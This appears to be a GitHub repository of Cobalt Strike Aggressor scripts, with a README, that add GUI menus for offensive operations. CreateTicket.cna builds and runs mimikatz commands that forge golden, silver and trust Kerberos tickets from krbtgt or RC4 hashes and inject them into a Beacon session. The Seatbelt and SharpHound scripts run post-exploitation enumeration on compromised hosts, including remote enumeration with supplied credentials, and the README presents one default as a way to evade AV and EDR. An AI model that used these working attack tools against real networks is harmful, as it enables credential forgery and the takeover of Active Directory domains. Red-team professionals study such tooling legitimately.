├── CreateTicket.cna
├── README.md
├── Seatbelt.cna
├── SharpHound.cna
└── screenshots
    ├── createticket-golden.png
    ├── createticket-silver.png
    ├── createticket-trust.png
    ├── createticket.png
    ├── seatbelt-command-args.png
    ├── seatbelt-command-groups.png
    ├── seatbelt-remote-enum.png
    ├── seatbelt.png
    └── sharphound.png


/CreateTicket.cna:
--------------------------------------------------------------------------------
# CreateTicket Aggressor Script
# Author: @captmeelo
# Blog: https://captmeelo.com/
# GitHub: https://github.com/capt-meelo

# Adds a "Create Ticket" submenu to the beacon_bottom popup. Each menu item
# forwards $1 (the value the popup hook supplies for the selection) to the
# matching dialog builder below.
popup beacon_bottom {
    menu "Create Ticket" {
        item "Golden Ticket" {
            createGoldenTicket($1);
        }
        item "Silver Ticket" {
            createSilverTicket($1);
        }
        item "Trust Ticket" {
            createTrustTicket($1);
        }
    }
}

# Show the "Golden Ticket" dialog; when "Run" is pressed, build a mimikatz
# kerberos::golden command from the dialog fields and task it through
# bmimikatz.
#
# $1 - Beacon ID(s) forwarded by the popup menu item.
#
# NOTE(review): $bid, $dialog and $command are assigned without local(), so
# they look script-global. The callback reads $bid when "Run" is pressed, not
# when the dialog was opened; if another dialog is opened for a different
# Beacon in between, the task would go to that Beacon. Confirm, and consider
# binding $bid into the lambda.
sub createGoldenTicket {
    $bid = $1;

    # The %(...) map pre-fills the dialog fields; the SID is a placeholder.
    $dialog = dialog("Golden Ticket", %(user => "Administrator", domain => "domain.local", domain_SID => "S-1-5-21-000000000-1111111111-2222222222"), lambda({
        # $3 holds the dialog values keyed by row name. custom_args is spliced
        # in verbatim with no validation. /endin, /renewmax and /ptt are fixed.
        $command = "kerberos::golden /user:$3['user'] /domain:$3['domain'] /sid:$3['domain_SID'] /krbtgt:$3['krbtgt_hash'] $3['custom_args'] /endin:600 /renewmax:10080 /ptt";
        # NOTE(review): binput records the full command text, so the krbtgt
        # hash ends up in the Beacon console output. Treat those logs as
        # credential material.
        binput($bid, "mimikatz $command");
        bmimikatz($bid, $command);
        })
    );

    dialog_description($dialog, "Generate a golden ticket and inject it into the current session.");
    drow_text($dialog, "user", "User to Impersonate: ");
    drow_text($dialog, "domain", "Domain FQDN: ");
    drow_text($dialog, "domain_SID", "Domain SID: ");
    drow_krbtgt($dialog, "krbtgt_hash", "KRBTGT Hash: ");
    drow_text($dialog, "custom_args", "Custom Args: ");
    dbutton_action($dialog, "Run");
    dbutton_help($dialog, "https://adsecurity.org/?page_id=1821#KERBEROSGolden");
    dialog_show($dialog);
}

# Show the "Silver Ticket" dialog; when "Run" is pressed, build a mimikatz
# command from the dialog fields and task it through bmimikatz. The command
# uses the same kerberos::golden module as the golden-ticket dialog, with
# /target, /rc4 and /service taken from the extra fields.
#
# $1 - Beacon ID(s) forwarded by the popup menu item.
#
# NOTE(review): same apparent global-variable behaviour for $bid as in
# createGoldenTicket - confirm.
sub createSilverTicket {
    $bid = $1;

    # Defaults shown in the dialog; target_hash and custom_args start empty.
    $dialog = dialog("Silver Ticket", %(user => "ServerAdmin", domain => "domain.local", domain_SID => "S-1-5-21-000000000-1111111111-2222222222", target_host => "srv01.domain.local", service => "cifs"), lambda({
        # $3 holds the dialog values keyed by row name; custom_args is spliced
        # in verbatim with no validation.
        $command = "kerberos::golden /user:$3['user'] /domain:$3['domain'] /sid:$3['domain_SID'] /target:$3['target_host'] /rc4:$3['target_hash'] /service:$3['service'] $3['custom_args'] /endin:600 /renewmax:10080 /ptt";
        # NOTE(review): the RC4 hash typed into the dialog is part of the text
        # recorded by binput.
        binput($bid, "mimikatz $command");
        bmimikatz($bid, $command);
        })
    );

    dialog_description($dialog, "Create a silver ticket and inject it into the current session.");
    drow_text($dialog, "user", "User to Impersonate: ");
    drow_text($dialog, "domain", "Domain FQDN: ");
    drow_text($dialog, "domain_SID", "Domain SID: ");
    drow_text($dialog, "target_host", "Target Host FQDN: ");
    drow_text($dialog, "target_hash", "Target Host Hash (RC4): ");
    drow_text($dialog, "service", "Service: ");
    drow_text($dialog, "custom_args", "Custom Args: ");
    dbutton_action($dialog, "Run");
    dbutton_help($dialog, "https://adsecurity.org/?page_id=1821#SilverTicket");
    dialog_show($dialog);
}

# Show the "Trust Ticket" dialog; when "Run" is pressed, build a mimikatz
# kerberos::golden command that also passes the SID_history field as /sids,
# and task it through bmimikatz.
#
# $1 - Beacon ID(s) forwarded by the popup menu item.
#
# NOTE(review): same apparent global-variable behaviour for $bid as in
# createGoldenTicket - confirm.
sub createTrustTicket {
    $bid = $1;

    # Defaults shown in the dialog; both SIDs are placeholders.
    $dialog = dialog("Trust Ticket", %(user => "Administrator", domain => "domain.local", domain_SID => "S-1-5-21-000000000-1111111111-2222222222", SID_history => "S-1-5-21-3333333333-4444444444-555555555-519"), lambda({
        # $3 holds the dialog values keyed by row name; custom_args is spliced
        # in verbatim with no validation.
        $command = "kerberos::golden /user:$3['user'] /domain:$3['domain'] /sid:$3['domain_SID'] /sids:$3['SID_history'] /krbtgt:$3['krbtgt_hash'] $3['custom_args'] /endin:600 /renewmax:10080 /ptt";
        # NOTE(review): the krbtgt hash is part of the text recorded by binput.
        binput($bid, "mimikatz $command");
        bmimikatz($bid, $command);
        })
    );

    dialog_description($dialog, "Generate a trust ticket and inject it into the current session.");
    drow_text($dialog, "user", "User to Impersonate: ");
    drow_text($dialog, "domain", "Domain FQDN: ");
    drow_text($dialog, "domain_SID", "Domain SID: ");
    drow_text($dialog, "SID_history", "SID History: ");
    drow_krbtgt($dialog, "krbtgt_hash", "KRBTGT Hash: ");
    drow_text($dialog, "custom_args", "Custom Args: ");
    dbutton_action($dialog, "Run");
    dbutton_help($dialog, "https://adsecurity.org/?page_id=1821#TrustTicket");
    dialog_show($dialog);
}

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
## AggressorScripts

Collection of scripts that I created to make my life easier since I'm not good at remembering command-line options and don't like typing things.

### CreateTicket.cna

- Generate golden, silver, and trust tickets from the GUI. The created tickets are then injected into the current session.
- The default settings are:
  - It uses the `/endin:600` and `/renewmax:10080` arguments to set the ticket lifetime and the maximum lifetime that a ticket can be renewed.

**Screenshots**

![createticket.png](./screenshots/createticket.png "CreateTicket Menu")

![createticket-golden.png](./screenshots/createticket-golden.png "Creating Golden Ticket ")

![createticket-silver.png](./screenshots/createticket-silver.png "Creating Silver Ticket ")

![createticket-trust.png](./screenshots/createticket-trust.png "Creating Trust Ticket ")
---

### Seatbelt.cna

- Run Seatbelt from the GUI.
- The default settings are:
  - It runs Seatbelt using the `-full` option to return complete results without any filtering. _(Can only be disabled by removing the `-full` string from the code.)_
  - It saves the result to `C:\Windows\Temp\out.txt`. Leaving this option **blank** won't save the result to a file.
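- _**Note:** Before using, modify the value of the `$assembly` variable first and point it to the location of the Seatbelt binary._

**Screenshots**

![seatbelt.png](./screenshots/seatbelt.png "Executing Seatbelt")

![seatbelt-command-args.png](./screenshots/seatbelt-command-args.png "Running Command Groups") ![seatbelt-command-groups.png](./screenshots/seatbelt-command-groups.png "Running Command Arguments")

![seatbelt-remote-enum.png](./screenshots/seatbelt-remote-enum.png "Running Remote Enumeration")
---

### SharpHound.cna

- Run SharpHound from the GUI.
- The default settings are:
  - It runs using the `--NoSaveCache` option to prevent writing cache files to disk, which can help with AV and EDR evasion.
  - It saves the result to `C:\Windows\Temp\` directory. Leaving this option **blank** will save the file to the directory where SharpHound was launched from.
- _**Note:** Before using, modify the value of the `$assembly` variable first and point it to the location of the Sharphound binary._

**Screenshots**

![sharphound.png](./screenshots/sharphound.png "Running SharpHound")
---

--------------------------------------------------------------------------------
/Seatbelt.cna:
--------------------------------------------------------------------------------
# Seatbelt Aggressor Script
# Author: @captmeelo
# Blog: https://captmeelo.com/
# GitHub: https://github.com/capt-meelo

# Location of Seatbelt binary
# (passed as the assembly argument of bexecute_assembly in every callback below)
$assembly = "C:\\tools\\SharpCollection\\NetFramework_4.0_x64\\Seatbelt.exe";

# Adds a "Seatbelt" submenu to the beacon_bottom popup. Each menu item
# forwards $1 (the value the popup hook supplies for the selection) to the
# matching dialog builder below.
popup beacon_bottom {
    menu "Seatbelt" {
        item "Run Command Groups" {
            runCommandGroups($1);
        }
        item "Run Command Arguments" {
            runCommandArguments($1);
        }
        item "Remote Enumeration" {
            runRemoteEnum($1);
        }
    }
}

# Show a dialog that runs Seatbelt with one of its command groups.
# The resulting arguments are: -group=<group> -full [-outputfile="<path>"].
#
# $1 - Beacon ID(s) forwarded by the popup menu item.
#
# NOTE(review): $bid, $dialog and the callback variables are assigned without
# local(), so they look script-global. The callback reads $bid when "Run" is
# pressed; if another dialog is opened for a different Beacon in between, the
# task would go to that Beacon. Confirm, and consider binding $bid into the
# lambda.
sub runCommandGroups {
    $bid = $1;

    # The output-file field is pre-filled. If left as is, the results are
    # written to that path on the target, and nothing in this script removes
    # the file afterwards.
    $dialog = dialog("Seatbelt", %(outputfile => "C:\\Windows\\Temp\\out.txt"), lambda({
        # $3 holds the dialog values keyed by row name.
        $group = $3["group"];

        # Only emit -outputfile when the field was filled in.
        if ($3["outputfile"] ne $null) {
            $outputfile = $3["outputfile"];
            $outputfile = "-outputfile=\"$outputfile\"";
        } else {
            $outputfile = "";
        }

        $command = "-group=$group -full $outputfile";
        binput($bid, "execute-assembly $assembly $command");
        bexecute_assembly($bid, $assembly, $command);
        })
    );

    dialog_description($dialog, "Run Seatbelt using the default command groups. Output file can either be \".txt\" or \".json\".");
    drow_combobox($dialog, "group", "Group:", @("All", "User", "System", "Slack", "Chromium", "Misc"));
    drow_text($dialog, "outputfile", "Output File: ");
    dbutton_action($dialog, "Run");
    dbutton_help($dialog, "https://github.com/GhostPack/Seatbelt/blob/master/README.md#command-groups");
    dialog_show($dialog);
}

# Show a dialog that runs Seatbelt with free-form command arguments.
# The resulting arguments are: "<arguments>" -full [-outputfile="<path>"].
#
# $1 - Beacon ID(s) forwarded by the popup menu item.
#
# NOTE(review): same apparent global-variable behaviour for $bid as in
# runCommandGroups - confirm.
sub runCommandArguments {
    $bid = $1;

    $dialog = dialog("Seatbelt", %(arguments => "LogonEvents 30", outputfile => "C:\\Windows\\Temp\\out.txt"), lambda({
        # $3 holds the dialog values keyed by row name.
        $arguments = $3["arguments"];

        # Only emit -outputfile when the field was filled in.
        if ($3["outputfile"] ne $null) {
            $outputfile = $3["outputfile"];
            $outputfile = "-outputfile=\"$outputfile\"";
        } else {
            $outputfile = "";
        }

        # The whole arguments field is wrapped in a single pair of quotes.
        $command = "\"$arguments\" -full $outputfile";
        binput($bid, "execute-assembly $assembly $command");
        bexecute_assembly($bid, $assembly, $command);
        })
    );

    dialog_description($dialog, "Run Seatbelt by passing arguments. Output file can either be \".txt\" or \".json\".");
    drow_text($dialog, "arguments", "Command Arguments: ");
    drow_text($dialog, "outputfile", "Output File: ");
    dbutton_action($dialog, "Run");
    dbutton_help($dialog, "https://github.com/GhostPack/Seatbelt/blob/master/README.md#command-arguments");
    dialog_show($dialog);
}

# Show a dialog that runs Seatbelt's "remote" group against another system.
# The resulting arguments are: -group=remote -computername=<host>
# -username=<user> -password="<password>" -full [-outputfile="<path>"].
#
# $1 - Beacon ID(s) forwarded by the popup menu item.
#
# NOTE(review): same apparent global-variable behaviour for $bid as in
# runCommandGroups - confirm.
sub runRemoteEnum {
    $bid = $1;

    $dialog = dialog("Seatbelt", %(outputfile => "C:\\Windows\\Temp\\out.txt"), lambda({
        # $3 holds the dialog values keyed by row name.
        $computername = $3["computername"];
        $username = $3["username"];
        $password = $3["password"];

        # Only emit -outputfile when the field was filled in.
        if ($3["outputfile"] ne $null) {
            $outputfile = $3["outputfile"];
            $outputfile = "-outputfile=\"$outputfile\"";
        } else {
            $outputfile = "";
        }

        $command = "-group=remote -computername=$computername -username=$username -password=\"$password\" -full $outputfile";
        # NOTE(review): the password is typed into a plain drow_text row and
        # is part of the command line recorded by binput, so it appears in
        # clear text in the Beacon console output. Treat those logs as
        # credential material.
        binput($bid, "execute-assembly $assembly $command");
        bexecute_assembly($bid, $assembly, $command);
        })
    );

    dialog_description($dialog, "Run Seatbelt against a remote system. Output file can either be \".txt\" or \".json\".");
    drow_text($dialog, "computername", "Remote System (FQDN/IP): ");
    drow_text($dialog, "username", "Username (Domain\\User): ");
    drow_text($dialog, "password", "Password: ");
    drow_text($dialog, "outputfile", "Output File: ");
    dbutton_action($dialog, "Run");
    dbutton_help($dialog, "https://github.com/GhostPack/Seatbelt/blob/master/README.md#remote-enumeration");
    dialog_show($dialog);
}

--------------------------------------------------------------------------------
/SharpHound.cna:
--------------------------------------------------------------------------------
# SharpHound Aggressor Script
# Author: @captmeelo
# Blog: https://captmeelo.com/
# GitHub: https://github.com/capt-meelo

# Location of SharpHound binary
# (passed as the assembly argument of bexecute_assembly in the callback below)
$assembly = "C:\\tools\\SharpCollection\\NetFramework_4.5_x64\\SharpHound.exe";

# Adds a "SharpHound" item to the beacon_bottom popup and forwards $1 (the
# value the popup hook supplies for the selection) to runSharpHound.
popup beacon_bottom {
    item "SharpHound" {
        runSharpHound($1);
    }
}

# Show a dialog that runs SharpHound through bexecute_assembly.
# The resulting arguments are: --CollectionMethod <method> [--Domain <domain>]
# --NoSaveCache [--Stealth] [--OutputDirectory <dir>].
#
# $1 - Beacon ID(s) forwarded by the popup menu item.
#
# NOTE(review): $bid, $dialog and the callback variables are assigned without
# local(), so they look script-global. The callback reads $bid when "Run" is
# pressed; if another dialog is opened for a different Beacon in between, the
# task would go to that Beacon. Confirm, and consider binding $bid into the
# lambda.
sub runSharpHound {
    $bid = $1;

    # The output directory is pre-filled. Collection output is written there
    # on the target, and nothing in this script removes it afterwards.
    $dialog = dialog("SharpHound", %(collectionmethod => "Default", outputdir => "C:\\Windows\\Temp\\"), lambda({
        # $3 holds the dialog values keyed by row name.
        $collectionmethod = $3["collectionmethod"];

        # Only emit --Domain when the field was filled in.
        if ($3["domain"] ne $null) {
            $domain = $3["domain"];
            $domain = "--Domain $domain";
        } else {
            $domain = "";
        }

        # The checkbox value is compared as the string "true".
        if ($3["stealth"] eq "true") {
            $stealth = "--Stealth";
        } else {
            $stealth = "";
        }

        # Only emit --OutputDirectory when the field was filled in.
        if ($3["outputdir"] ne $null) {
            $outputdir = $3["outputdir"];
            # Fix: this assignment had no terminating ';'.
            $outputdir = "--OutputDirectory $outputdir";
        } else {
            $outputdir = "";
        }

        # --NoSaveCache is always passed; it is not a dialog option.
        $command = "--CollectionMethod $collectionmethod $domain --NoSaveCache $stealth $outputdir";
        binput($bid, "execute-assembly $assembly $command");
        bexecute_assembly($bid, $assembly, $command);
        })
    );

    dialog_description($dialog, "Execute SharpHound without saving cache file to disk for OPSEC.");
    drow_combobox($dialog, "collectionmethod", "Collection Method:", @("All,GPOLocalGroup", "All", "Default", "Group", "LocalAdmin", "RDP", "DCOM", "PSRemote", "GPOLocalGroup", "Session", "ComputerOnly", "LoggedOn", "Trusts", "ACL", "Container", "DcOnly", "ObjectProps"));
    drow_text($dialog, "domain", "Domain: ");
    drow_text($dialog, "outputdir", "Output Directory: ");
    drow_checkbox($dialog, "stealth", "Stealth Mode: ", "Enable");
    dbutton_action($dialog, "Run");
    dbutton_help($dialog, "https://bloodhound.readthedocs.io/en/latest/data-collection/sharphound.html");
    dialog_show($dialog);
}

--------------------------------------------------------------------------------
/screenshots/createticket-golden.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/capt-meelo/AggressorScripts/aa53e7219c2ba4c3d6e7acb889b63889431712b0/screenshots/createticket-golden.png

--------------------------------------------------------------------------------
/screenshots/createticket-silver.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/capt-meelo/AggressorScripts/aa53e7219c2ba4c3d6e7acb889b63889431712b0/screenshots/createticket-silver.png

--------------------------------------------------------------------------------
/screenshots/createticket-trust.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/capt-meelo/AggressorScripts/aa53e7219c2ba4c3d6e7acb889b63889431712b0/screenshots/createticket-trust.png

--------------------------------------------------------------------------------
/screenshots/createticket.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/capt-meelo/AggressorScripts/aa53e7219c2ba4c3d6e7acb889b63889431712b0/screenshots/createticket.png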
-------------------------------------------------------------------------------- /screenshots/seatbelt-command-args.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/capt-meelo/AggressorScripts/aa53e7219c2ba4c3d6e7acb889b63889431712b0/screenshots/seatbelt-command-args.png -------------------------------------------------------------------------------- /screenshots/seatbelt-command-groups.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/capt-meelo/AggressorScripts/aa53e7219c2ba4c3d6e7acb889b63889431712b0/screenshots/seatbelt-command-groups.png -------------------------------------------------------------------------------- /screenshots/seatbelt-remote-enum.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/capt-meelo/AggressorScripts/aa53e7219c2ba4c3d6e7acb889b63889431712b0/screenshots/seatbelt-remote-enum.png -------------------------------------------------------------------------------- /screenshots/seatbelt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/capt-meelo/AggressorScripts/aa53e7219c2ba4c3d6e7acb889b63889431712b0/screenshots/seatbelt.png -------------------------------------------------------------------------------- /screenshots/sharphound.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/capt-meelo/AggressorScripts/aa53e7219c2ba4c3d6e7acb889b63889431712b0/screenshots/sharphound.png --------------------------------------------------------------------------------